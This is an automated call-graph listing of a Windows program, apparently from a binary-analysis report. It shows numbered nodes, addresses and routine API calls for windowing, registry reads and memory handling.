51687->51685 51690 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51687->51690 51691 47b100 51687->51691 51935 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51687->51935 51936 403800 51687->51936 51940 42c97c CharPrevA 51687->51940 51690->51687 51692 47b152 51691->51692 51695 47b130 51691->51695 51693 47b172 51692->51693 51694 47b160 51692->51694 51698 47b1d5 51693->51698 51699 47b180 51693->51699 51696 403494 4 API calls 51694->51696 51695->51692 51945 47a030 19 API calls 51695->51945 51929 47b16d 51696->51929 51709 47b1f6 51698->51709 51710 47b1e3 51698->51710 51701 47b1af 51699->51701 51702 47b189 51699->51702 51700 403400 4 API calls 51704 47baf8 51700->51704 51703 47b1c2 51701->51703 51947 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51701->51947 51705 47b19c 51702->51705 51946 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51702->51946 51707 403494 4 API calls 51703->51707 51708 403400 4 API calls 51704->51708 51712 403494 4 API calls 51705->51712 51707->51929 51713 47bb00 51708->51713 51715 47b217 51709->51715 51716 47b204 51709->51716 51714 403494 4 API calls 51710->51714 51712->51929 51713->51687 51714->51929 51718 47b267 51715->51718 51719 47b225 51715->51719 51717 403494 4 API calls 51716->51717 51717->51929 51724 47b275 51718->51724 51725 47b288 51718->51725 51720 47b241 51719->51720 51721 47b22e 51719->51721 51723 47b254 51720->51723 51948 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51720->51948 51722 403494 4 API calls 51721->51722 51722->51929 51727 403494 4 API calls 51723->51727 51728 403494 4 API calls 51724->51728 51729 47b296 51725->51729 51730 47b2a9 51725->51730 51727->51929 51728->51929 51731 403494 4 API calls 51729->51731 51732 47b2b7 51730->51732 51733 47b2ca 51730->51733 51731->51929 51734 403494 4 API calls 51732->51734 51735 47b2eb 51733->51735 51736 47b2d8 51733->51736 51734->51929 51738 47b327 51735->51738 51739 47b2f9 51735->51739 51737 403494 4 API calls 51736->51737 51737->51929 51744 47b335 51738->51744 51745 47b364 51738->51745 51740 47b315 51739->51740 51741 47b302 51739->51741 51743 47c26c 43 API calls 51740->51743 51742 403494 4 API calls 51741->51742 51742->51929 51743->51929 51746 47b351 51744->51746 51747 47b33e 51744->51747 51750 47b372 51745->51750 51751 47b3a0 51745->51751 51749 403494 4 API calls 51746->51749 51748 403494 4 API calls 51747->51748 51748->51929 51749->51929 51752 47b38e 51750->51752 51753 47b37b 51750->51753 51756 47b3ae 51751->51756 51929->51700 51935->51687 51937 403804 51936->51937 51938 40382f 51936->51938 51939 4038a4 4 API calls 51937->51939 51938->51687 51939->51938 51940->51687 51945->51695 51946->51705 51947->51703 51948->51723 52024->51668 52026 47dd19 52025->52026 52031 47dd56 52025->52031 52057 455d0c 52026->52057 52030 47dd6d 52030->51036 52031->51036 52176 466714 52032->52176 52035->51046 52037 42f56c 52036->52037 52038 42f58f GetActiveWindow GetFocus 52037->52038 52039 41eea4 2 API calls 52038->52039 52040 42f5a6 52039->52040 52041 42f5c3 52040->52041 52042 42f5b3 RegisterClassA 52040->52042 52043 42f652 SetFocus 52041->52043 52044 42f5d1 CreateWindowExA 52041->52044 52042->52041 52045 403400 4 API calls 52043->52045 52044->52043 52046 42f604 52044->52046 52047 42f66e 52045->52047 52207 42427c 52046->52207 52052 494f3c 18 API calls 52047->52052 52049 42f62c 52050 42f634 CreateWindowExA 52049->52050 52050->52043 52051 42f64a ShowWindow 52050->52051 52051->52043 52052->51083 52213 44b514 52053->52213 52058 455d1d 52057->52058 52059 455d21 52058->52059 52060 455d2a 52058->52060 52083 455a10 52059->52083 52091 455af0 29 API calls 52060->52091 52063 455d27 52063->52031 52064 47d970 52063->52064 52067 47da6c 52064->52067 52076 47d9b0 52064->52076 52065 403420 4 API calls 52066 47db4f 52065->52066 52066->52030 52074 47dabd 52067->52074 52079 47da0f 52067->52079 52146 479630 52067->52146 52071 47c26c 43 API calls 52071->52074 52072 454100 20 API calls 52072->52074 52073 47c26c 43 API calls 52073->52076 52074->52067 52074->52071 52074->52072 52078 47da59 52074->52078 52075 47c26c 43 API calls 52081 47da18 52075->52081 52076->52067 52076->52073 52076->52079 52076->52081 52120 479770 52076->52120 52131 4798d4 52076->52131 52078->52079 52079->52065 52081->52075 52081->52076 52081->52078 52135 42c92c 52081->52135 52140 42c954 52081->52140 52145 47d67c 52 API calls 52081->52145 52092 42de1c 52083->52092 52085 455a2d 52086 455a7b 52085->52086 52095 455944 52085->52095 52086->52063 52089 455944 6 API calls 52090 455a5c RegCloseKey 52089->52090 52090->52063 52091->52063 52093 42de27 52092->52093 52094 42de2d RegOpenKeyExA 52092->52094 52093->52094 52094->52085 52100 42dd58 52095->52100 52097 403420 4 API calls 52099 4559f6 52097->52099 52098 45596c 52098->52097 52099->52089 52103 42dc00 52100->52103 52104 42dc26 RegQueryValueExA 52103->52104 52109 42dc49 52104->52109 52119 42dc6b 52104->52119 52105 403400 4 API calls 52107 42dd37 52105->52107 52106 42dc63 52108 403400 4 API calls 52106->52108 52107->52098 52108->52119 52109->52106 52110 4034e0 4 API calls 52109->52110 52111 403744 4 API calls 52109->52111 52109->52119 52110->52109 52112 42dca0 RegQueryValueExA 52111->52112 52112->52104 52113 42dcbc 52112->52113 52114 4038a4 4 API calls 52113->52114 52113->52119 52115 42dcfe 52114->52115 52116 42dd10 52115->52116 52118 403744 4 API calls 52115->52118 52117 403450 4 API calls 52116->52117 52117->52119 52118->52116 52119->52105 52121 479786 52120->52121 52122 479782 52120->52122 52123 403450 4 API calls 52121->52123 52122->52076 52124 479793 52123->52124 52125 4797b3 52124->52125 52126 479799 52124->52126 52128 479630 19 API calls 52125->52128 52127 479630 19 API calls 52126->52127 52129 4797af 52127->52129 52128->52129 52130 403400 4 API calls 52129->52130 52130->52122 52133 4798e0 52131->52133 52132 4798fb 52132->52076 52133->52132 52158 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52133->52158 52159 42c79c 52135->52159 52138 403778 4 API calls 52139 42c94e 52138->52139 52139->52081 52141 42c79c IsDBCSLeadByte 52140->52141 52142 42c964 52141->52142 52143 403778 4 API calls 52142->52143 52144 42c975 52143->52144 52144->52081 52145->52081 52147 47964b 52146->52147 52150 47967c 52147->52150 52157 47970a 52147->52157 52171 4794e4 19 API calls 52147->52171 52149 4796a1 52153 4796c2 52149->52153 52173 4794e4 19 API calls 52149->52173 52150->52149 52172 4794e4 19 API calls 52150->52172 52154 479702 52153->52154 52153->52157 52174 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52153->52174 52165 479368 52154->52165 52157->52067 52158->52132 52160 42c67c IsDBCSLeadByte 52159->52160 52162 42c7b1 52160->52162 52161 42c7fb 52161->52138 52162->52161 52164 42c444 IsDBCSLeadByte 52162->52164 52164->52162 52166 4793a3 52165->52166 52167 403450 4 API calls 52166->52167 52168 4793c8 52167->52168 52175 477a58 19 API calls 52168->52175 52170 479409 52170->52157 52171->52150 52172->52149 52173->52153 52174->52154 52175->52170 52177 403494 4 API calls 52176->52177 52178 466742 52177->52178 52193 42dbc8 52178->52193 52181 42dbc8 5 API calls 52182 466766 52181->52182 52183 466600 19 API calls 52182->52183 52184 466770 52183->52184 52185 42dbc8 5 API calls 52184->52185 52186 46677f 52185->52186 52196 466678 52186->52196 52189 42dbc8 5 API calls 52190 466798 52189->52190 52191 403400 4 API calls 52190->52191 52192 4667ad 52191->52192 52192->51041 52200 42db10 52193->52200 52197 466698 52196->52197 52198 4078f4 19 API calls 52197->52198 52199 4666e2 52198->52199 52199->52189 52201 42dbbb 52200->52201 52202 42db30 52200->52202 52201->52181 52202->52201 52203 4037b8 4 API calls 52202->52203 52205 403800 4 API calls 52202->52205 52206 42c444 IsDBCSLeadByte 52202->52206 52203->52202 52205->52202 52206->52202 52208 4242ae 52207->52208 52209 42428e GetWindowTextA 52207->52209 52211 403494 4 API calls 52208->52211 52210 4034e0 4 API calls 52209->52210 52212 4242ac 52210->52212 52211->52212 52212->52049 52216 44b38c 52213->52216 52217 44b3bf 52216->52217 52218 414ae8 4 API calls 52217->52218 52221 44b3d2 52218->52221 52219 44b3ff GetDC 52227 41a1e8 52219->52227 52220 40357c 4 API calls 52220->52219 52221->52219 52221->52220 52224 44b430 52235 44b0c0 52224->52235 52228 41a213 52227->52228 52229 41a2af 52227->52229 52246 403520 52228->52246 52230 403400 4 API calls 52229->52230 52231 41a2c7 SelectObject 52230->52231 52231->52224 52233 41a26b 52247 4034e0 4 API calls 52246->52247 52248 40352a 52247->52248 52248->52233 52251 4652d7 52249->52251 52250 4653b2 52260 46708c 52250->52260 52251->52250 52255 465327 52251->52255 52272 421a1c 52251->52272 52252 46536a 52252->52250 52278 4185b8 7 API calls 52252->52278 52255->52252 52256 465361 52255->52256 52257 46536c 52255->52257 52258 421a1c 7 API calls 52256->52258 52259 421a1c 7 API calls 52257->52259 52258->52252 52259->52252 52261 4670bc 52260->52261 52262 46709d 52260->52262 52261->51101 52263 414b18 4 API calls 52262->52263 52264 4670ab 52263->52264 52265 414b18 4 API calls 52264->52265 52265->52261 52274 421a74 52272->52274 52277 421a2a 52272->52277 52273 421a59 52273->52274 52287 421d28 SetFocus GetFocus 52273->52287 52274->52255 52277->52273 52279 408cbc 52277->52279 52278->52250 52280 408cc8 52279->52280 52288 406dec LoadStringA 52280->52288 52283 403450 4 API calls 52284 408cf9 52283->52284 52285 403400 4 API calls 52284->52285 52286 408d0e 52285->52286 52286->52273 52287->52274 52289 4034e0 4 API calls 52288->52289 52290 406e19 52289->52290 52290->52283 52339 46c7a5 52338->52339 52340 46c7f2 52339->52340 52341 414ae8 4 API calls 52339->52341 52343 403420 4 API calls 52340->52343 52342 46c7bb 52341->52342 52545 466924 6 API calls 52342->52545 52345 46c89c 52343->52345 52345->51181 52537 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52345->52537 52346 46c7c3 52347 414b18 4 API calls 52346->52347 52348 46c7d1 52347->52348 52349 46c7de 52348->52349 52351 46c7f7 52348->52351 52546 47efd0 42 API calls 52349->52546 52352 46c80f 52351->52352 52353 466a08 CharNextA 52351->52353 52547 47efd0 42 API calls 52352->52547 52355 46c80b 52353->52355 52355->52352 52356 46c825 52355->52356 52357 46c841 52356->52357 52358 46c82b 52356->52358 52360 42c99c CharNextA 52357->52360 52548 47efd0 42 API calls 52358->52548 52361 46c84e 52360->52361 52361->52340 52549 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52361->52549 52363 46c865 52364 451458 4 API calls 52363->52364 52365 46c872 52364->52365 52550 47efd0 42 API calls 52365->52550 52368 4241ed SetActiveWindow 52367->52368 52372 424223 52367->52372 52551 42364c 52368->52551 52372->51193 52372->51194 52373 42420a 52373->52372 52374 42421d SetFocus 52373->52374 52374->52372 52376 482505 52375->52376 52377 4824d7 52375->52377 52379 475bd0 52376->52379 52564 494cec 18 API calls 52377->52564 52565 457d10 52379->52565 52538->51189 52545->52346 52546->52340 52547->52340 52548->52340 52549->52363 52550->52340 52560 4235f8 SystemParametersInfoA 52551->52560 52554 423665 ShowWindow 52556 423670 52554->52556 52557 423677 52554->52557 52563 423628 SystemParametersInfoA 52556->52563 52559 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52557->52559 52559->52373 52561 423616 52560->52561 52561->52554 52562 423628 SystemParametersInfoA 52561->52562 52562->52554 52563->52557 52564->52376 52566 457e44 52565->52566 52567 457d3c 52565->52567 52568 457e95 52566->52568 53041 45757c 6 API calls 52566->53041 53037 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52567->53037 52571 403400 4 API calls 52568->52571 52573 457eaa 52571->52573 52572 457d44 52574 4078f4 19 API calls 52572->52574 52586 4072a8 52573->52586 52575 457db5 52574->52575 53038 457d00 20 API calls 52575->53038 52587 403738 52586->52587 53037->52572 53041->52568 54238 431eec 54199->54238 54201 43d9f2 54202 403400 4 API calls 54201->54202 54203 43da76 54202->54203 54203->51250 54203->51251 54205 431bd6 54204->54205 54206 402648 4 API calls 54205->54206 54207 431c06 54206->54207 54208 4947f8 54207->54208 54209 4948cd 54208->54209 54213 494812 54208->54213 54215 494910 54209->54215 54211 433d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54211->54213 54213->54209 54213->54211 54214 403450 4 API calls 54213->54214 54243 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54213->54243 54244 431ca0 54213->54244 54214->54213 54216 49492c 54215->54216 54252 433d6c 54216->54252 54218 494931 54219 431ca0 4 API calls 54218->54219 54220 49493c 54219->54220 54221 43d594 54220->54221 54222 43d5c1 54221->54222 54223 43d5b3 54221->54223 54222->51261 54223->54222 54224 43d63d 54223->54224 54228 447084 4 API calls 54223->54228 54231 43d6f7 54224->54231 54255 447084 54224->54255 54226 43d688 54261 43dd50 54226->54261 54228->54223 54229 43d8fd 54229->54222 54281 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54229->54281 54231->54229 54232 43d8de 54231->54232 54279 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54231->54279 54280 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54232->54280 54235->51263 54236->51265 54237->51252 54239 403494 4 API calls 54238->54239 54241 431efb 54239->54241 54240 431f25 54240->54201 54241->54240 54242 403744 4 API calls 54241->54242 54242->54241 54243->54213 54245 431cc0 54244->54245 54246 431cae 54244->54246 54248 431ce2 54245->54248 54251 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54245->54251 54250 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54246->54250 54248->54213 54250->54245 54251->54248 54253 402648 4 API calls 54252->54253 54254 433d7b 54253->54254 54254->54218 54256 4470a3 54255->54256 54257 4470aa 54255->54257 54282 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54256->54282 54259 431ca0 4 API calls 54257->54259 54260 4470ba 54259->54260 54260->54226 54262 43dd6c 54261->54262 54275 43dd99 54261->54275 54263 402660 4 API calls 54262->54263 54262->54275 54263->54262 54264 43ddce 54264->54231 54266 43fea5 54266->54264 54267 43c938 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54267->54275 54268 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54268->54275 54273 433d18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54273->54275 54274 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54274->54275 54275->54264 54275->54266 54275->54267 54275->54268 54275->54273 54275->54274 54276 436650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54276 54277 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54277 54278 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54278 54283 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54283 54284 4396e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54284 54285 43dc48 18 API calls 54275->54285 54286 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54275->54286 54276->54275 54277->54275 54278->54275 54279->54231 54280->54229 54281->54229 54282->54257 54283->54275 54284->54275 54285->54275 54286->54275 54289 41fb58 54290 41fb61 54289->54290 54293 41fdfc 54290->54293 54292 41fb6e 54294 41feee 54293->54294 54295 41fe13 54293->54295 54294->54292 54295->54294 54314 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 54295->54314 54297 41fe49 54298 41fe73 54297->54298 54299 41fe4d 54297->54299 54324 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 54298->54324 54315 41fb9c 54299->54315 54302 41fe81 54305 41fe85 54302->54305 54306 41feab 54302->54306 54304 41fb9c 10 API calls 54307 41fe71 54304->54307 54308 41fb9c 10 API calls 54305->54308 54309 41fb9c 10 API calls 54306->54309 54307->54292 54310 41fe97 54308->54310 54311 41febd 54309->54311 54312 41fb9c 10 API calls 54310->54312 54313 41fb9c 10 API calls 54311->54313 54312->54307 54313->54307 54314->54297 54316 41fbb7 54315->54316 54317 41f93c 4 API calls 54316->54317 54318 41fbcd 54316->54318 54317->54318 54325 41f93c 54318->54325 54320 41fc15 54321 41fc38 SetScrollInfo 54320->54321 54333 41fa9c 54321->54333 54324->54302 54326 4181e0 54325->54326 54327 41f959 GetWindowLongA 54326->54327 54328 41f996 54327->54328 54329 41f976 54327->54329 54345 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 54328->54345 54344 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 54329->54344 54332 41f982 54332->54320 54334 41fab2 54333->54334 54335 41faaa 54333->54335 54336 41faef 54334->54336 54337 41faf1 54334->54337 54338 41fae1 54334->54338 54335->54304 54339 41fb31 GetScrollPos 54336->54339 54347 417e48 IsWindowVisible ScrollWindow SetWindowPos 54337->54347 54346 417e48 IsWindowVisible ScrollWindow SetWindowPos 54338->54346 54339->54335 54342 41fb3c 54339->54342 54343 41fb4b SetScrollPos 54342->54343 54343->54335 54344->54332 54345->54332 54346->54336 54347->54336 54348 420598 54349 4205ab 54348->54349 54369 415b30 54349->54369 54351 4206f2 54352 420709 54351->54352 54376 4146d4 KiUserCallbackDispatcher 54351->54376 54353 420720 54352->54353 54377 414718 KiUserCallbackDispatcher 54352->54377 54359 420742 54353->54359 54378 420060 12 API calls 54353->54378 54354 420651 54374 420848 20 API calls 54354->54374 54355 4205e6 54355->54351 54355->54354 54362 420642 MulDiv 54355->54362 54360 42066a 54360->54351 54375 420060 12 API calls 54360->54375 54373 41a304 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 54362->54373 54365 420687 54366 4206a3 MulDiv 54365->54366 54367 4206c6 54365->54367 54366->54367 54367->54351 54368 4206cf MulDiv 54367->54368 54368->54351 54370 415b42 54369->54370 54379 414470 54370->54379 54372 415b5a 54372->54355 54373->54354 54374->54360 54375->54365 54376->54352 54377->54353 54378->54359 54380 41448a 54379->54380 54383 410458 54380->54383 54382 4144a0 54382->54372 54386 40dca4 54383->54386 54385 41045e 54385->54382 54387 40dd06 54386->54387 54388 40dcb7 54386->54388 54393 40dd14 54387->54393 54391 40dd14 19 API calls 54388->54391 54392 40dce1 54391->54392 54392->54385 54394 40dd24 54393->54394 54396 40dd3a 54394->54396 54405 40e09c 54394->54405 54421 40d5e0 54394->54421 54424 40df4c 54396->54424 54399 40dd42 54400 40d5e0 5 API calls 54399->54400 54401 40ddae 54399->54401 54427 40db60 54399->54427 54400->54399 54403 40df4c 5 API calls 54401->54403 54404 40dd10 54403->54404 54404->54385 54441 40e96c 54405->54441 54407 403778 4 API calls 54409 40e0d7 54407->54409 54408 40e18d 54410 40e1b7 54408->54410 54411 40e1a8 54408->54411 54409->54407 54409->54408 54504 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54409->54504 54505 40e080 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54409->54505 54501 40ba24 54410->54501 54450 40e3c0 54411->54450 54417 40e1b5 54418 403400 4 API calls 54417->54418 54419 40e25c 54418->54419 54419->54394 54422 40ea08 5 API calls 54421->54422 54423 40d5ea 54422->54423 54423->54394 54538 40d4bc 54424->54538 54547 40df54 54427->54547 54430 40e96c 5 API calls 54431 40db9e 54430->54431 54432 40e96c 5 API calls 54431->54432 54433 40dba9 54432->54433 54434 40dbc4 54433->54434 54435 40dbbb 54433->54435 54440 40dbc1 54433->54440 54554 40d9d8 54434->54554 54557 40dac8 19 API calls 54435->54557 54438 403420 4 API calls 54439 40dc8f 54438->54439 54439->54399 54440->54438 54507 40d780 54441->54507 54444 4034e0 4 API calls 54445 40e98f 54444->54445 54446 403744 4 API calls 54445->54446 54447 40e996 54446->54447 54448 40d780 5 API calls 54447->54448 54449 40e9a4 54448->54449 54449->54409 54451 40e3ec 54450->54451 54453 40e3f6 54450->54453 54512 40d440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54451->54512 54454 40e511 54453->54454 54455 40e495 54453->54455 54456 40e4f6 54453->54456 54457 40e576 54453->54457 54458 40e438 54453->54458 54459 40e4d9 54453->54459 54460 40e47a 54453->54460 54461 40e4bb 54453->54461 54472 40e45c 54453->54472 54464 40d764 5 API calls 54454->54464 54520 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54455->54520 54525 40e890 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54456->54525 54468 40d764 5 API calls 54457->54468 54513 40d764 54458->54513 54523 40e9a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54459->54523 54519 40d818 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54460->54519 54522 40dde4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54461->54522 54473 40e519 54464->54473 54467 403400 4 API calls 54474 40e5eb 54467->54474 54475 40e57e 54468->54475 54471 40e4a0 54521 40d470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54471->54521 54472->54467 54481 40e523 54473->54481 54482 40e51d 54473->54482 54474->54417 54483 40e582 54475->54483 54484 40e59b 54475->54484 54476 40e4e4 54524 409d38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54476->54524 54478 40e461 54518 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54478->54518 54479 40e444 54516 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54479->54516 54526 40ea08 54481->54526 54489 40e521 54482->54489 54490 40e53c 54482->54490 54492 40ea08 5 API calls 54483->54492 54532 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54484->54532 54530 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54489->54530 54493 40ea08 5 API calls 54490->54493 54492->54472 54495 40e544 54493->54495 54494 40e44f 54517 40e26c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54494->54517 54529 40d8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54495->54529 54498 40e566 54531 40e2d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54498->54531 54533 40b9d0 54501->54533 54504->54409 54505->54409 54506 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54506->54417 54509 40d78b 54507->54509 54508 40d7c5 54508->54444 54509->54508 54511 40d7cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54509->54511 54511->54509 54512->54453 54514 40ea08 5 API calls 54513->54514 54515 40d76e 54514->54515 54515->54478 54515->54479 54516->54494 54517->54472 54518->54472 54519->54472 54520->54471 54521->54472 54522->54472 54523->54476 54524->54472 54525->54472 54527 40d780 5 API calls 54526->54527 54528 40ea15 54527->54528 54528->54472 54529->54472 54530->54498 54531->54472 54532->54472 54534 40b9e2 54533->54534 54535 40ba07 54533->54535 54534->54535 54537 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54534->54537 54535->54417 54535->54506 54537->54535 54539 40ea08 5 API calls 54538->54539 54540 40d4c9 54539->54540 54541 40d4dc 54540->54541 54545 40eb0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54540->54545 54541->54399 54543 40d4d7 54546 40d458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54543->54546 54545->54543 54546->54541 54548 40d764 5 API calls 54547->54548 54549 40df6b 54548->54549 54550 40db93 54549->54550 54551 40ea08 5 API calls 54549->54551 54550->54430 54552 40df78 54551->54552 54552->54550 54558 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54552->54558 54559 40ab7c 19 API calls 54554->54559 54556 40da00 54556->54440 54557->54440 54558->54550 54559->54556 56764 40ce7c 56765 40ce84 56764->56765 56766 40ceae 56765->56766 56767 40ceb2 56765->56767 56768 40cea7 56765->56768 56770 40ceb6 56767->56770 56771 40cec8 56767->56771 56777 406288 GlobalHandle GlobalUnlock GlobalFree 56768->56777 56776 40625c GlobalAlloc GlobalLock 56770->56776 56778 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 56771->56778 56774 40cec4 56774->56766 56775 408cbc 5 API calls 56774->56775 56775->56766 56776->56774 56777->56766 56778->56774 56779 41363c SetWindowLongA GetWindowLongA 56780 413699 SetPropA SetPropA 56779->56780 56781 41367b GetWindowLongA 56779->56781 56786 41f39c 56780->56786 56781->56780 56782 41368a SetWindowLongA 56781->56782 56782->56780 56791 415270 56786->56791 56798 423c0c 56786->56798 56892 423a84 56786->56892 56787 4136e9 56793 41527d 56791->56793 56792 4152e1 56792->56787 56793->56792 56794 4152e3 56793->56794 56795 4152d8 56793->56795 56899 424b8c 13 API calls 56794->56899 56795->56792 56900 41505c 46 API calls 56795->56900 56801 423c42 56798->56801 56815 423c63 56801->56815 56901 423b68 56801->56901 56802 423cec 56804 423cf3 56802->56804 56805 423d27 56802->56805 56803 423c8d 56806 423c93 56803->56806 56807 423d50 56803->56807 56810 423cf9 56804->56810 56846 423fb1 56804->56846 56813 423d32 56805->56813 56814 42409a IsIconic 56805->56814 56811 423cc5 56806->56811 56812 423c98 56806->56812 56808 423d62 56807->56808 56809 423d6b 56807->56809 56816 423d78 56808->56816 56817 423d69 56808->56817 56908 424194 11 API calls 56809->56908 56819 423f13 SendMessageA 56810->56819 56820 423d07 56810->56820 56811->56815 56836 423cde 56811->56836 56837 423e3f 56811->56837 56822 423df6 56812->56822 56823 423c9e 56812->56823 56824 4240d6 56813->56824 56825 423d3b 56813->56825 56814->56815 56821 4240ae GetFocus 56814->56821 56815->56787 56828 4241dc 11 API calls 56816->56828 56909 423b84 NtdllDefWindowProc_A 56817->56909 56819->56815 56820->56815 56847 423cc0 56820->56847 56866 423f56 56820->56866 56821->56815 56829 4240bf 56821->56829 56913 423b84 NtdllDefWindowProc_A 56822->56913 56830 423ca7 56823->56830 56831 423e1e PostMessageA 56823->56831 56922 424850 WinHelpA PostMessageA 56824->56922 56827 4240ed 56825->56827 56825->56847 56834 4240f6 56827->56834 56835 42410b 56827->56835 56828->56815 56921 41eff4 GetCurrentThreadId EnumThreadWindows 56829->56921 56841 423cb0 56830->56841 56842 423ea5 56830->56842 56914 423b84 NtdllDefWindowProc_A 56831->56914 56833 423e39 56833->56815 56845 4244d4 5 API calls 56834->56845 56923 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56835->56923 56836->56847 56848 423e0b 56836->56848 56905 423b84 NtdllDefWindowProc_A 56837->56905 56852 423cb9 56841->56852 56853 423dce IsIconic 56841->56853 56843 423eae 56842->56843 56844 423edf 56842->56844 56916 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56843->56916 56906 423b84 NtdllDefWindowProc_A 56844->56906 56845->56815 56846->56815 56862 423fd7 IsWindowEnabled 56846->56862 56847->56815 56907 423b84 NtdllDefWindowProc_A 56847->56907 56859 424178 12 API calls 56848->56859 56851 4240c6 56851->56815 56861 4240ce SetFocus 56851->56861 56852->56847 56869 423d91 56852->56869 56855 423dea 56853->56855 56856 423dde 56853->56856 56912 423b84 NtdllDefWindowProc_A 56855->56912 56911 423bc0 15 API calls 56856->56911 56859->56815 56860 423e45 56867 423e83 56860->56867 56868 423e61 56860->56868 56861->56815 56862->56815 56873 423fe5 56862->56873 56865 423ee5 56874 423efd 56865->56874 56879 41eea4 2 API calls 56865->56879 56866->56815 56881 423f78 IsWindowEnabled 56866->56881 56876 423a84 6 API calls 56867->56876 56915 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56868->56915 56869->56815 56910 422c4c ShowWindow PostMessageA PostQuitMessage 56869->56910 56871 423ec8 56917 423b84 NtdllDefWindowProc_A 56871->56917 56872 423eb6 56872->56871 56877 41ef58 6 API calls 56872->56877 56884 423fec IsWindowVisible 56873->56884 56880 423a84 6 API calls 56874->56880 56883 423e8b PostMessageA 56876->56883 56877->56871 56879->56874 56880->56815 56881->56815 56885 423f86 56881->56885 56882 423e69 PostMessageA 56882->56815 56883->56815 56884->56815 56886 423ffa GetFocus 56884->56886 56918 412310 7 API calls 56885->56918 56888 4181e0 56886->56888 56889 42400f SetFocus 56888->56889 56919 415240 56889->56919 56893 423a94 56892->56893 56895 423b0d 56892->56895 56894 423a9a EnumWindows 56893->56894 56893->56895 56894->56895 56896 423ab6 GetWindow GetWindowLongA 56894->56896 56924 423a1c GetWindow 56894->56924 56895->56787 56897 423ad5 56896->56897 56897->56895 56898 423b01 SetWindowPos 56897->56898 56898->56895 56898->56897 56899->56792 56900->56792 56902 423b7d 56901->56902 56903 423b72 56901->56903 56902->56802 56902->56803 56903->56902 56904 408720 7 API calls 56903->56904 56904->56902 56905->56860 56906->56865 56907->56815 56908->56815 56909->56815 56910->56815 56911->56815 56912->56815 56913->56815 56914->56833 56915->56882 56916->56872 56917->56815 56918->56815 56920 41525b SetFocus 56919->56920 56920->56815 56921->56851 56922->56833 56923->56833 56925 423a3d GetWindowLongA 56924->56925 56926 423a49 56924->56926 56925->56926 56927 4809f7 56928 480a00 56927->56928 56930 480a2b 56927->56930 56929 480a1d 56928->56929 56928->56930 57325 476c50 189 API calls 56929->57325 56932 480a6a 56930->56932 57327 47f4a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56930->57327 56933 480a8e 56932->56933 56936 480a81 56932->56936 56937 480a83 56932->56937 56939 480aca 56933->56939 56940 480aac 56933->56940 56935 480a5d 57328 47f50c 42 API calls 56935->57328 56946 47f4e8 42 API calls 56936->56946 57329 47f57c 42 API calls 56937->57329 56938 480a22 56938->56930 57326 408be0 